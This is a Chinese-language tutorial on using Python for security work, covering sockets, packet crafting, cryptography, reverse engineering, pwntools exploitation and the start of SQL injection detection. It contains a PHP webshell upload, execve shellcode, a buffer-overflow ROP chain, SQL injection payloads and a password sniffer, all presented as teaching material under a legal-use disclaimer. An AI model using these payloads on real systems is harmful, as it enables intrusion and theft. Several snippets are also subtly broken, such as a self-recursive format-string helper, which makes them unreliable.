Python For Computer Security
计算机安全
Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety. — Benjamin Franklin
人们若以基本自由换取一时的安全保障,最终两者皆失。
免责声明
本文档仅用于**合法的安全研究、CTF 竞赛、授权渗透测试与安全教育**。未经授权对他人系统进行任何形式的安全测试属于违法行为。请在法律允许的范围内使用本文涉及的所有技术。
一、网络编程基础
网络安全的第一步是理解网络通信。Python 的标准库和第三方库提供了从原始套接字到高层 HTTP 请求的完整工具链。
Socket 编程
Socket 是网络通信的基石。几乎所有网络攻击工具的底层都依赖 socket 编程。
import socket
import threading
# ===== TCP 客户端 =====
def tcp_client(host, port):
"""基础 TCP 客户端:连接服务器,发送数据,接收响应"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.sendall(b"Hello, Server!\n")
data = s.recv(4096)
print(f"收到: {data.decode()}")
# ===== TCP 服务端 =====
def tcp_server(host, port):
"""基础 TCP 服务端:监听端口,接受连接"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
print(f"监听 {host}:{port}...")
while True:
conn, addr = s.accept()
with conn:
print(f"连接来自 {addr}")
data = conn.recv(4096)
conn.sendall(b"ACK: " + data)
# ===== UDP 通信 =====
def udp_send(host, port, message):
"""UDP 发送(无连接,不保证送达)"""
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.sendto(message.encode(), (host, port))
data, addr = s.recvfrom(4096)
print(f"收到来自 {addr}: {data.decode()}")
多线程服务器与端口扫描
import socket
import threading
from concurrent.futures import ThreadPoolExecutor
def simple_port_scan(host, port):
"""简单端口扫描:尝试 TCP 连接判断端口是否开放"""
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(1) # 1 秒超时
result = s.connect_ex((host, port)) # 返回 0 表示成功
if result == 0:
try:
service = socket.getservbyport(port)
except OSError:
service = "unknown"
return port, True, service
except (socket.timeout, socket.error):
pass
return port, False, ""
def scan_ports(host, ports, max_threads=100):
"""多线程端口扫描"""
open_ports = []
with ThreadPoolExecutor(max_workers=max_threads) as executor:
futures = {
executor.submit(simple_port_scan, host, port): port
for port in ports
}
for future in futures:
port, is_open, service = future.result()
if is_open:
open_ports.append((port, service))
print(f"[+] {port}/tcp OPEN ({service})")
return sorted(open_ports)
# 扫描常用端口
# common_ports = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 993, 995, 3306, 3389, 5432, 8080, 8443]
# results = scan_ports("scanme.nmap.org", common_ports)
socket 常用方法速查
| 方法 | 说明 |
|---|---|
socket.socket(family, type) |
创建套接字,AF_INET=IPv4, SOCK_STREAM=TCP, SOCK_DGRAM=UDP |
s.connect((host, port)) |
客户端连接服务器 |
s.bind((host, port)) |
服务端绑定地址 |
s.listen(backlog) |
开始监听 |
s.accept() |
接受连接,返回 (conn, addr) |
s.send(data) / s.sendall(data) |
发送数据 |
s.recv(bufsize) |
接收数据 |
s.settimeout(seconds) |
设置超时 |
s.connect_ex((host, port)) |
连接并返回错误码(0=成功),不会抛异常 |
HTTP 请求:requests 库
requests 是 Python 中最常用的 HTTP 客户端库,Web 安全工具几乎都依赖它。
import requests
# ===== 基本请求 =====
# GET 请求
resp = requests.get("https://httpbin.org/get", params={"key": "value"})
print(resp.status_code) # 200
print(resp.headers) # 响应头
print(resp.text) # 响应体(文本)
print(resp.json()) # 响应体(解析为 JSON)
print(resp.content) # 响应体(原始字节)
# POST 请求
resp = requests.post("https://httpbin.org/post",
data={"username": "admin", "password": "123456"})
# 或发送 JSON
resp = requests.post("https://httpbin.org/post",
json={"key": "value"})
# ===== 自定义 Headers =====
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"X-Forwarded-For": "127.0.0.1", # 常用于绕过 IP 限制
"Referer": "https://example.com",
"Cookie": "session=abc123",
}
resp = requests.get("https://httpbin.org/headers", headers=headers)
# ===== Session(保持 Cookie/状态) =====
session = requests.Session()
session.headers.update({"User-Agent": "SecurityScanner/1.0"})
# 登录
login_resp = session.post("https://example.com/login",
data={"user": "admin", "pass": "secret"})
# 后续请求自动携带 Cookie
dashboard = session.get("https://example.com/dashboard")
# ===== 代理 =====
proxies = {
"http": "http://127.0.0.1:8080", # Burp Suite 默认代理
"https": "http://127.0.0.1:8080",
}
resp = requests.get("https://httpbin.org/get", proxies=proxies,
verify=False) # 忽略 SSL 证书验证
# ===== 文件上传 =====
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")}
resp = requests.post("https://example.com/upload", files=files)
# ===== 超时与异常处理 =====
try:
resp = requests.get("https://example.com", timeout=5)
except requests.exceptions.Timeout:
print("请求超时")
except requests.exceptions.ConnectionError:
print("连接失败")
Scapy:网络包构造与嗅探
Scapy 是一个强大的交互式数据包操作库,能够构造、发送、嗅探和解析网络数据包。
from scapy.all import *
# ===== 构造数据包 =====
# 以太网帧
eth = Ether(dst="ff:ff:ff:ff:ff:ff", src="00:11:22:33:44:55")
# IP 层
ip = IP(src="192.168.1.100", dst="192.168.1.1")
# TCP 层
tcp = TCP(sport=12345, dport=80, flags="S") # SYN 包
# 组装完整数据包
pkt = ip / tcp
print(pkt.show()) # 显示数据包结构
pkt_hex = hexdump(pkt) # 十六进制
# ===== 发送数据包 =====
# 发送三层包(自动处理路由)
send(IP(dst="8.8.8.8") / ICMP())
# 发送二层包(需要指定接口)
sendp(Ether() / IP(dst="8.8.8.8") / ICMP(), iface="eth0")
# 发送并接收响应
ans = sr1(IP(dst="8.8.8.8") / ICMP(), timeout=3)
if ans:
print(f"收到来自 {ans.src} 的响应")
# ===== TCP SYN 扫描 =====
def syn_scan(target, ports):
"""SYN 半开扫描:发送 SYN 包,根据响应判断端口状态"""
results = {}
for port in ports:
pkt = IP(dst=target) / TCP(dport=port, flags="S")
resp = sr1(pkt, timeout=1, verbose=0)
if resp is None:
results[port] = "filtered"
elif resp.haslayer(TCP):
if resp[TCP].flags == 0x12: # SYN-ACK → 端口开放
# 发送 RST 关闭连接
send(IP(dst=target) / TCP(dport=port, flags="R"), verbose=0)
results[port] = "open"
elif resp[TCP].flags == 0x14: # RST-ACK → 端口关闭
results[port] = "closed"
elif resp.haslayer(ICMP):
results[port] = "filtered"
return results
# ===== 嗅探数据包 =====
def packet_handler(pkt):
"""处理嗅探到的每个数据包"""
if pkt.haslayer(TCP) and pkt.haslayer(Raw):
payload = pkt[Raw].load
if b"password" in payload or b"passwd" in payload:
print(f"[!] 可疑流量: {pkt[IP].src}:{pkt[TCP].sport} -> "
f"{pkt[IP].dst}:{pkt[TCP].dport}")
print(f" 载荷: {payload[:200]}")
# 嗅探 HTTP 流量
# sniff(filter="tcp port 80", prn=packet_handler, count=100, iface="eth0")
# ===== ARP 扫描(发现局域网主机)=====
def arp_scan(network):
"""ARP 扫描发现活跃主机"""
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network),
timeout=2, verbose=0)
hosts = []
for sent, received in ans:
hosts.append((received[ARP].psrc, received[Ether].src))
print(f"[+] {received[ARP].psrc} ({received[Ether].src})")
return hosts
# arp_scan("192.168.1.0/24")
# ===== DNS 查询 =====
def dns_query(domain, dns_server="8.8.8.8"):
"""手动构造 DNS 查询包"""
pkt = IP(dst=dns_server) / UDP(dport=53) / DNS(
rd=1,
qd=DNSQR(qname=domain)
)
resp = sr1(pkt, timeout=3, verbose=0)
if resp and resp.haslayer(DNS):
for i in range(resp[DNS].ancount):
rr = resp[DNS].an[i]
print(f"{rr.rname.decode()} -> {rr.rdata}")
二、密码学
Python 拥有丰富的密码学库,覆盖从基础哈希到高级加密算法的完整工具链。
hashlib:哈希函数
哈希(摘要)函数是密码学的基石——将任意长度的输入映射为固定长度的输出,且不可逆。
import hashlib
import hmac
# ===== 常用哈希算法 =====
data = b"Hello, Security!"
# MD5(已不安全,但仍常用于校验完整性)
md5 = hashlib.md5(data).hexdigest()
print(f"MD5: {md5}") # 32 个十六进制字符
# SHA-1(已不安全,Git 仍在使用)
sha1 = hashlib.sha1(data).hexdigest()
print(f"SHA-1: {sha1}") # 40 个十六进制字符
# SHA-256(目前推荐)
sha256 = hashlib.sha256(data).hexdigest()
print(f"SHA-256:{sha256}") # 64 个十六进制字符
# SHA-512
sha512 = hashlib.sha512(data).hexdigest()
print(f"SHA-512:{sha512}") # 128 个十六进制字符
# ===== 分块计算(处理大文件) =====
h = hashlib.sha256()
with open("large_file.bin", "rb") as f:
while chunk := f.read(8192): # walrus operator (:=),Python 3.8+
h.update(chunk)
file_hash = h.hexdigest()
print(f"文件 SHA-256: {file_hash}")
# ===== HMAC(基于哈希的消息认证码)=====
# HMAC = Hash(key + Hash(key + message))
# 用于验证消息完整性和真实性
key = b"secret_key"
message = b"important data"
mac = hmac.new(key, message, hashlib.sha256).hexdigest()
print(f"HMAC-SHA256: {mac}")
# 验证 HMAC(防止时序攻击)
is_valid = hmac.compare_digest(mac, expected_mac)
哈希算法安全性速查
| 算法 | 输出长度 | 安全性 | 常见用途 |
|---|---|---|---|
| MD5 | 128 bit | 已破解(碰撞攻击) | 文件校验、非安全场景 |
| SHA-1 | 160 bit | 已破解(碰撞攻击) | Git commit hash |
| SHA-256 | 256 bit | 安全 | 数字签名、区块链、证书 |
| SHA-512 | 512 bit | 安全 | 高安全需求场景 |
| SHA-3 | 可变 | 安全(不同结构) | 后量子密码学准备 |
密码哈希:bcrypt / argon2
存储用户密码时,绝不能使用普通哈希函数——必须使用专门的密码哈希算法(加盐 + 慢哈希)。
# pip install bcrypt
import bcrypt
# 注册:哈希密码
password = b"my_secure_password"
salt = bcrypt.gensalt(rounds=12) # rounds 越大越慢(防暴力破解)
hashed = bcrypt.hashpw(password, salt)
print(f"哈希结果: {hashed}") # 包含算法版本、轮次、盐值、哈希值
# 登录:验证密码
is_valid = bcrypt.checkpw(password, hashed) # True
is_wrong = bcrypt.checkpw(b"wrong", hashed) # False
# pip install argon2-cffi(Argon2:密码哈希竞赛冠军)
from argon2 import PasswordHasher
ph = PasswordHasher(time_cost=3, memory_cost=65536, parallelism=4)
hash_str = ph.hash("my_secure_password")
is_valid = ph.verify(hash_str, "my_secure_password") # True
对称加密:AES
对称加密使用同一密钥加密和解密。
# pip install pycryptodome
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
# ===== AES-CBC 模式 =====
key = get_random_bytes(32) # AES-256: 32 字节密钥
iv = get_random_bytes(16) # 16 字节初始向量
# 加密
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = b"Top secret message about 疾旋鼬!"
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
print(f"密文(hex): {ciphertext.hex()}")
# 解密
decipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = unpad(decipher.decrypt(ciphertext), AES.block_size)
print(f"解密结果: {decrypted.decode()}")
# ===== AES-GCM 模式(推荐:认证加密,同时提供保密性和完整性)=====
key = get_random_bytes(32)
cipher = AES.new(key, AES.MODE_GCM)
plaintext = b"Secret data"
ciphertext, tag = cipher.encrypt_and_digest(plaintext)
print(f"密文: {ciphertext.hex()}")
print(f"认证标签: {tag.hex()}")
# 解密 + 验证
decipher = AES.new(key, AES.MODE_GCM, nonce=cipher.nonce)
decrypted = decipher.decrypt_and_verify(ciphertext, tag) # 验证失败会抛异常
非对称加密:RSA
非对称加密使用公钥加密、私钥解密,是 HTTPS、数字签名的基础。
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
# ===== 生成 RSA 密钥对 =====
key = RSA.generate(2048)
private_key = key
public_key = key.publickey()
# 导出为 PEM 格式
private_pem = private_key.export_key()
public_pem = public_key.export_key()
# 保存到文件
with open("private.pem", "wb") as f:
f.write(private_pem)
with open("public.pem", "wb") as f:
f.write(public_pem)
# 从文件加载
with open("private.pem", "rb") as f:
private_key = RSA.import_key(f.read())
# ===== RSA 加密(适合加密少量数据,如对称密钥)=====
cipher = PKCS1_OAEP.new(public_key)
ciphertext = cipher.encrypt(b"Short secret")
print(f"RSA 密文长度: {len(ciphertext)} 字节")
# 解密
decipher = PKCS1_OAEP.new(private_key)
plaintext = decipher.decrypt(ciphertext)
print(f"解密: {plaintext.decode()}")
# ===== RSA 数字签名 =====
message = b"Important document"
h = SHA256.new(message)
signature = pkcs1_15.new(private_key).sign(h)
print(f"签名: {signature.hex()}")
# 验证签名
try:
h = SHA256.new(message)
pkcs1_15.new(public_key).verify(h, signature)
print("签名验证成功")
except (ValueError, TypeError):
print("签名验证失败!文件可能被篡改")
常见编码与解码
安全工具中经常需要在不同编码格式之间转换。
import base64
import binascii
import urllib.parse
data = b"admin:password123"
# Base64 编码/解码(常用于 HTTP Basic Auth、数据混淆)
b64 = base64.b64encode(data)
print(f"Base64: {b64.decode()}") # YWRtaW46cGFzc3dvcmQxMjM=
decoded = base64.b64decode(b64)
print(f"解码: {decoded.decode()}")
# Base64 URL 安全变体
b64url = base64.urlsafe_b64encode(data)
# URL 编码/解码(Web 安全中处理特殊字符)
encoded = urllib.parse.quote("SELECT * FROM users WHERE name='admin'")
print(f"URL编码: {encoded}") # SELECT%20*%20FROM%20...
decoded = urllib.parse.unquote(encoded)
# Hex 编码/解码
hex_str = binascii.hexlify(data).decode()
print(f"Hex: {hex_str}") # 61646d696e3a7061...
raw = binascii.unhexlify(hex_str)
# 十六进制与字节互转(内置方法)
hex_bytes = data.hex() # bytes -> hex str
raw_bytes = bytes.fromhex(hex_bytes) # hex str -> bytes
# ROT13(凯撒密码的一种特例)
import codecs
rot13 = codecs.encode("attack at dawn", "rot_13")
print(f"ROT13: {rot13}") # nggnpx ng qnja
original = codecs.decode(rot13, "rot_13")
三、二进制分析与逆向工程
struct:二进制数据打包与解包
struct 是 Python 标准库中处理二进制数据的核心工具,用于将 Python 值与 C 结构体之间转换。
import struct
# ===== 打包(Python 值 → 二进制字节)=====
# 常用格式字符:
# < 小端序, > 大端序
# B unsigned char (1字节), H unsigned short (2字节), I unsigned int (4字节)
# Q unsigned long long (8字节), i signed int, f float, d double
# 构造一个 ELF 文件头的一部分
e_ident = b'\x7fELF' # ELF 魔数
e_type = 2 # ET_EXEC (可执行文件)
e_machine = 62 # EM_X86_64
e_version = 1 # EV_CURRENT
header = struct.pack('<4sHHI', e_ident, e_type, e_machine, e_version)
print(f"打包结果: {header.hex()}")
# 7f454c46 0200 3e00 01000000
# ===== 解包(二进制字节 → Python 值)=====
ident, etype, machine, version = struct.unpack('<4sHHI', header[:12])
print(f"魔数: {ident}, 类型: {etype}, 架构: {machine}")
# ===== calcsize:计算结构体大小 =====
print(f"<4sHHI 大小: {struct.calcsize('<4sHHI')} 字节") # 12
# ===== 处理文件中的二进制数据 =====
def parse_pe_header(filepath):
"""解析 PE 文件的 DOS Header"""
with open(filepath, 'rb') as f:
# IMAGE_DOS_HEADER 的前几个字段
dos_header = f.read(64)
magic = dos_header[0:2]
if magic != b'MZ':
print("不是有效的 PE 文件")
return None
# e_lfanew: PE 头的偏移量(位于偏移 0x3C 处)
e_lfanew = struct.unpack('<I', dos_header[0x3C:0x40])[0]
print(f"PE 头偏移: 0x{e_lfanew:X}")
# 跳转到 PE 头
f.seek(e_lfanew)
pe_signature = f.read(4)
if pe_signature != b'PE\x00\x00':
print("无效的 PE 签名")
return None
# COFF Header
machine, num_sections, timestamp = struct.unpack('<HHI', f.read(8))
machine_names = {0x14c: "x86", 0x8664: "x86_64", 0xAA64: "ARM64"}
print(f"架构: {machine_names.get(machine, 'Unknown')}")
print(f"节区数量: {num_sections}")
return e_lfanew
# ===== 构造网络协议数据包 =====
def build_dns_query(domain):
"""手动构造 DNS 查询报文"""
# DNS Header
tx_id = 0x1234
flags = 0x0100 # 标准查询,期望递归
qdcount = 1
header = struct.pack('>HHHHHH', tx_id, flags, qdcount, 0, 0, 0)
# DNS Question: 域名编码
question = b''
for label in domain.split('.'):
question += struct.pack('B', len(label)) + label.encode()
question += b'\x00' # 域名结束
question += struct.pack('>HH', 1, 1) # QTYPE=A, QCLASS=IN
return header + question
ctypes:调用 C 代码与操作内存
ctypes 允许 Python 调用 C 动态链接库,在漏洞分析和利用中极其重要。
import ctypes
import ctypes.wintypes as wintypes
# ===== 调用 libc =====
libc = ctypes.CDLL("libc.so.6") # Linux
# libc = ctypes.CDLL("msvcrt.dll") # Windows
# 调用 C 的 printf
libc.printf(b"Hello from C! %d\n", 42)
# 调用 C 的 malloc/free
libc.malloc.restype = ctypes.c_void_p
libc.malloc.argtypes = [ctypes.c_size_t]
ptr = libc.malloc(1024)
print(f"分配的内存地址: 0x{ptr:x}")
libc.free(ptr)
# ===== 自定义 C 结构体 =====
class Elf64_Ehdr(ctypes.Structure):
"""ELF64 文件头结构体"""
_fields_ = [
("e_ident", ctypes.c_char * 16), # ELF 标识
("e_type", ctypes.c_uint16), # 文件类型
("e_machine", ctypes.c_uint16), # 目标架构
("e_version", ctypes.c_uint32), # 版本
("e_entry", ctypes.c_uint64), # 入口点地址
("e_phoff", ctypes.c_uint64), # 程序头表偏移
("e_shoff", ctypes.c_uint64), # 节头表偏移
("e_flags", ctypes.c_uint32), # 标志
("e_ehsize", ctypes.c_uint16), # 文件头大小
("e_phentsize", ctypes.c_uint16), # 程序头条目大小
("e_phnum", ctypes.c_uint16), # 程序头条目数
("e_shentsize", ctypes.c_uint16), # 节头条目大小
("e_shnum", ctypes.c_uint16), # 节头条目数
("e_shstrndx", ctypes.c_uint16), # 节名字符串表索引
]
def parse_elf_header(filepath):
"""使用 ctypes 解析 ELF 文件头"""
with open(filepath, 'rb') as f:
raw = f.read(ctypes.sizeof(Elf64_Ehdr))
ehdr = Elf64_Ehdr.from_buffer_copy(raw)
if ehdr.e_ident[:4] != b'\x7fELF':
print("不是 ELF 文件")
return
print(f"入口点: 0x{ehdr.e_entry:x}")
print(f"程序头偏移: 0x{ehdr.e_phoff:x}")
print(f"节头偏移: 0x{ehdr.e_shoff:x}")
print(f"程序头数量: {ehdr.e_phnum}")
# ===== Windows API 调用(进程注入等场景)=====
def read_remote_memory(pid, address, size):
"""读取远程进程内存(Windows)"""
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
PROCESS_VM_READ = 0x0010
handle = kernel32.OpenProcess(PROCESS_VM_READ, False, pid)
if not handle:
raise ctypes.WinError(ctypes.get_last_error())
buffer = ctypes.create_string_buffer(size)
bytes_read = ctypes.c_size_t(0)
kernel32.ReadProcessMemory(
handle,
ctypes.c_void_p(address),
buffer,
size,
ctypes.byref(bytes_read)
)
kernel32.CloseHandle(handle)
return buffer.raw[:bytes_read.value]
pefile:PE 文件分析
# pip install pefile
import pefile
def analyze_pe(filepath):
"""分析 PE 文件结构"""
pe = pefile.PE(filepath)
# 基本信息
print(f"入口点: 0x{pe.OPTIONAL_HEADER.AddressOfEntryPoint:X}")
print(f"镜像基址: 0x{pe.OPTIONAL_HEADER.ImageBase:X}")
print(f"子系统: {pe.OPTIONAL_HEADER.Subsystem}")
print(f"时间戳: {pe.FILE_HEADER.TimeDateStamp}")
# 节区信息
print("\n=== 节区 ===")
for section in pe.sections:
name = section.Name.decode().rstrip('\x00')
vsize = section.Misc_VirtualSize
rsize = section.SizeOfRawData
chars = section.Characteristics
flags = []
if chars & 0x20: flags.append("CODE")
if chars & 0x40: flags.append("INITIALIZED_DATA")
if chars & 0x80: flags.append("UNINITIALIZED_DATA")
if chars & 0x20000000: flags.append("EXECUTE")
if chars & 0x40000000: flags.append("READ")
if chars & 0x80000000: flags.append("WRITE")
print(f" {name:10s} VSize=0x{vsize:08X} RSize=0x{rsize:08X} "
f"Flags={'+'.join(flags)}")
# 导入表
print("\n=== 导入表 ===")
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
for entry in pe.DIRECTORY_ENTRY_IMPORT:
dll_name = entry.dll.decode()
print(f" {dll_name}:")
for imp in entry.imports:
if imp.name:
print(f" {imp.name.decode()} (0x{imp.address:08X})")
else:
print(f" Ordinal#{imp.ordinal} (0x{imp.address:08X})")
# 导出表
if hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):
print("\n=== 导出表 ===")
for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols:
if exp.name:
print(f" {exp.name.decode()} (0x{exp.address:08X})")
return pe
# analyze_pe("target.exe")
Capstone:反汇编引擎
Capstone 是一个多架构反汇编框架,支持 x86、ARM、MIPS 等。
# pip install capstone
from capstone import *
def disassemble_bytes(code_bytes, arch=CS_ARCH_X86, mode=CS_MODE_64, base_addr=0x400000):
"""反汇编字节码"""
md = Cs(arch, mode)
md.detail = True # 启用详细信息
for insn in md.disasm(code_bytes, base_addr):
print(f"0x{insn.address:08X}: {insn.mnemonic:8s} {insn.op_str}")
# 示例输出:
# 0x00400000: push rbp
# 0x00400001: mov rbp, rsp
# 0x00400004: sub rsp, 0x20
# x86-64 常见指令的机器码
code = b"\x55\x48\x89\xe5\x48\x83\xec\x20\xc7\x45\xfc\x00\x00\x00\x00"
disassemble_bytes(code)
# ARM64
arm64_code = b"\x00\x00\xa0\xe3" # mov r0, #0
md_arm = Cs(CS_ARCH_ARM, CS_MODE_ARM)
for insn in md_arm.disasm(arm64_code, 0x8000):
print(f"0x{insn.address:04X}: {insn.mnemonic:8s} {insn.op_str}")
# ===== 分析 ELF 中的 .text 段 =====
def disassemble_elf_text(filepath):
"""反汇编 ELF 文件的代码段"""
import lief
binary = lief.parse(filepath)
text_section = binary.get_section(".text")
if text_section:
code = bytes(text_section.content)
base = text_section.virtual_address
print(f".text 段: 偏移=0x{base:X}, 大小={len(code)} 字节")
disassemble_bytes(code, base_addr=base)
Unicorn:CPU 模拟器
Unicorn 可以模拟执行机器码,非常适合分析 shellcode 或在不运行完整程序的情况下测试代码片段。
# pip install unicorn
from unicorn import *
from unicorn.x86_const import *
def emulate_shellcode(shellcode, base_addr=0x1000000):
"""模拟执行 x86-64 shellcode"""
# 初始化模拟器: x86-64
mu = Uc(UC_ARCH_X86, UC_MODE_64)
# 映射内存: 2MB
mu.mem_map(base_addr, 2 * 1024 * 1024)
# 写入 shellcode
mu.mem_write(base_addr, shellcode)
# 设置栈(x86 栈向低地址增长)
stack_base = 0x2000000
mu.mem_map(stack_base, 2 * 1024 * 1024)
mu.reg_write(UC_X86_REG_RSP, stack_base + 1024 * 1024)
# Hook:跟踪每条指令
def hook_code(mu, address, size, user_data):
code = mu.mem_read(address, size)
print(f"执行: 0x{address:08X} {code.hex()}")
mu.hook_add(UC_HOOK_CODE, hook_code)
# 执行
try:
mu.emu_start(base_addr, base_addr + len(shellcode), timeout=5 * UC_SECOND_SCALE)
except UcError as e:
print(f"模拟终止: {e}")
# 读取寄存器状态
rax = mu.reg_read(UC_X86_REG_RAX)
rbx = mu.reg_read(UC_X86_REG_RBX)
print(f"RAX = 0x{rax:016X}")
print(f"RBX = 0x{rbx:016X}")
# 模拟一段简单的 shellcode(x86-64: mov rax, 42; ret)
simple_shellcode = b"\x48\xc7\xc0\x2a\x00\x00\x00\xc3"
emulate_shellcode(simple_shellcode)
angr:二进制分析框架
angr 是一个功能强大的二进制分析平台,支持符号执行、约束求解、控制流图恢复等。
# pip install angr
import angr
import claripy
def find_vulnerability(binary_path):
"""使用符号执行寻找程序中的漏洞路径"""
# 加载二进制文件
proj = angr.Project(binary_path, auto_load_libs=False)
# 创建初始状态(从 main 函数开始)
state = proj.factory.entry_state()
# 创建模拟管理器
simgr = proj.factory.simulation_manager(state)
# 符号执行:寻找到达 "success" 和 "failure" 的路径
# find: 目标地址(成功路径)
# avoid: 要避免的地址(失败路径)
# simgr.explore(find=0x401234, avoid=0x401256)
# 或者通过 hook 寻找
def is_successful(state):
# 检查是否到达了某个成功的输出
stdout = state.posix.dumps(1) # stdout
return b"success" in stdout
def should_abort(state):
stdout = state.posix.dumps(1)
return b"fail" in stdout
simgr.explore(find=is_successful, avoid=should_abort)
if simgr.found:
found_state = simgr.found[0]
print("[+] 找到成功路径!")
# 获取输入(即触发成功路径的输入)
input_data = found_state.posix.dumps(0) # stdin
print(f" 输入: {input_data}")
return input_data
else:
print("[-] 未找到成功路径")
return None
# ===== 控制流图(CFG)分析 =====
def analyze_cfg(binary_path):
"""分析程序的控制流图"""
proj = angr.Project(binary_path, auto_load_libs=False)
cfg = proj.analyses.CFGFast()
# 获取所有函数
for func_addr, func in cfg.kb.functions.items():
print(f"函数: {func.name} @ 0x{func_addr:X}")
# 基本块数量
print(f" 基本块数: {len(func.blocks)}")
# 调用的函数
for callee in func.functions_called():
print(f" 调用: {callee.name}")
pwntools:漏洞利用开发工具包
pwntools 是 CTF 和漏洞利用开发中最核心的 Python 库,提供了从交互式通信到 ROP 链构建的全套工具。
# pip install pwntools
from pwn import *
# ===== 远程连接与本地进程 =====
# 连接远程服务
# r = remote("challenge.example.com", 1337)
# 本地运行程序
# p = process("./vuln")
# ===== 打包/解包(自动处理架构)=====
# 32 位
print(p32(0xdeadbeef)) # b'\xef\xbe\xad\xde'(小端序)
print(u32(b'\xef\xbe\xad\xde')) # 0xdeadbeef
# 64 位
print(p64(0x4141414141414141)) # b'AAAAAAAA'
print(u64(b'AAAAAAAA')) # 0x4141414141414141
# ===== ELF 文件分析 =====
elf = ELF("./vuln")
print(f"入口点: 0x{elf.entry:x}")
print(f"main: 0x{elf.symbols['main']:x}")
print(f"puts: 0x{elf.plt['puts']:x}") # PLT 表地址
print(f"puts: 0x{elf.got['puts']:x}") # GOT 表地址
# 查找 gadgets
# rop = ROP(elf)
# rop.call("puts", [elf.got["puts"]])
# print(rop.dump())
# ===== 构造 ROP 链 =====
def build_rop_chain(elf_path):
"""构造基础 ROP 链(64 位 Linux)"""
elf = ELF(elf_path)
rop = ROP(elf)
# 自动寻找 gadgets
pop_rdi = rop.find_gadget(["pop rdi", "ret"])[0] # 控制第一个参数
ret = rop.find_gadget(["ret"])[0] # 用于栈对齐
log.info(f"pop rdi; ret @ 0x{pop_rdi:x}")
log.info(f"ret @ 0x{ret:x}")
# 构造 ROP 链
payload = b'A' * 72 # padding(覆盖到返回地址)
# 调用 puts(puts@GOT) 泄露 puts 的真实地址
payload += p64(pop_rdi)
payload += p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
# 返回 main,执行第二次溢出
payload += p64(elf.symbols['main'])
return payload
# ===== Shellcode =====
def get_shellcode():
"""生成执行 execve("/bin/sh") 的 shellcode"""
context.arch = 'amd64' # 设置目标架构
# 或 context.arch = 'i386'
# 自动生成 shellcode
sc = asm(shellcraft.sh())
log.info(f"Shellcode 长度: {len(sc)} 字节")
return sc
# 手动构造 shellcode(x86-64 execve /bin/sh)
shellcode = (
b"\x48\x31\xf6" # xor rsi, rsi
b"\x48\x31\xd2" # xor rdx, rdx
b"\x48\xbb\x2f\x62\x69\x6e\x2f" # mov rbx, '/bin/sh'
b"\x73\x68\x00"
b"\x53" # push rbx
b"\x48\x89\xe7" # mov rdi, rsp
b"\x48\x31\xc0" # xor rax, rax
b"\xb0\x3b" # mov al, 59 (execve)
b"\x0f\x05" # syscall
)
# ===== 格式化字符串漏洞利用 =====
def fmtstr_payload(offset, writes):
"""
构造格式化字符串攻击载荷
offset: 格式化字符串在栈上的偏移
writes: {地址: 值} 的字典
"""
# 示例: 将 0xdeadbeef 写入地址 0x0804A000
payload = fmtstr_payload(6, {0x0804A000: 0xdeadbeef})
return payload
# ===== 交互式利用模板 =====
def exploit_template():
"""标准漏洞利用模板"""
context.arch = 'amd64'
context.log_level = 'info'
# p = process("./vuln")
# 或
# p = remote("challenge.ctf.com", 1337)
# 接收提示信息
# p.recvuntil(b"Enter your name: ")
# 发送 payload
# payload = b'A' * offset + p64(target_addr)
# p.sendline(payload)
# 切换到交互模式(获取 shell)
# p.interactive()
pass
GDB Python API:动态调试
# 在 GDB 中运行 Python 脚本(GDB 内置 Python 支持)
# gdb -x script.py ./target
import gdb
def set_break_at_func(func_name):
"""在函数入口设置断点"""
bp = gdb.Breakpoint(func_name)
return bp
def get_registers():
"""获取当前寄存器值"""
regs = {}
for name in ["rax", "rbx", "rcx", "rdx", "rsi", "rdi",
"rsp", "rbp", "rip", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]:
try:
val = gdb.parse_and_eval(f"${name}")
regs[name] = int(val)
except:
pass
return regs
def read_memory(address, size):
"""读取内存"""
inferior = gdb.selected_inferior()
return inferior.read_memory(address, size)
def backtrace():
"""获取调用栈"""
bt = gdb.execute("bt", to_string=True)
return bt
# GDB Python 脚本示例:自动分析栈溢出
def analyze_stack_frame():
"""分析当前栈帧,寻找溢出点"""
rsp = int(gdb.parse_and_eval("$rsp"))
rbp = int(gdb.parse_and_eval("$rbp"))
rip = int(gdb.parse_and_eval("$rip"))
frame_size = rbp - rsp
log.info(f"栈帧大小: {frame_size} 字节")
log.info(f"返回地址 @ 0x{rip:x}")
# 读取栈上的数据
data = read_memory(rsp, frame_size + 8)
return data
四、Web 安全
SQL 注入检测
import requests
def detect_sqli(url, params):
"""基础 SQL 注入检测"""
# 常见 SQL 注入 Payload
sqli_payloads = [
"'",
"\"",
"' OR '1'='1",
"\" OR \"1\"=\"1",
"' OR '1'='1' --",
"' UNION SELECT NULL--",
"1' AND '1'='1",
"1' AND '1'='2",
"1 AND 1=1",
"1 AND 1=2",
"' OR 1=1#",
"admin'--",
]
# 基于错误的检测
error_signatures = [
"sql syntax",
"mysql_fetch",
"ORA-",
"PostgreSQL",
"sqlite3",
"Microsoft OLE DB",
"unclosed quotation",
"syntax error",
]
results = []
